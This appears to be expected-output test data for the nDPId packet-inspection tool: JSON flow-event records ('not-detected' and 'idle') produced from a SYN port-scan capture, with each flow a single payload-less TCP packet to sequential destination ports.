+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1052,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1053,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1603,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059410,"flow_last_seen":1278275059410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1742,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1057,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1059,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
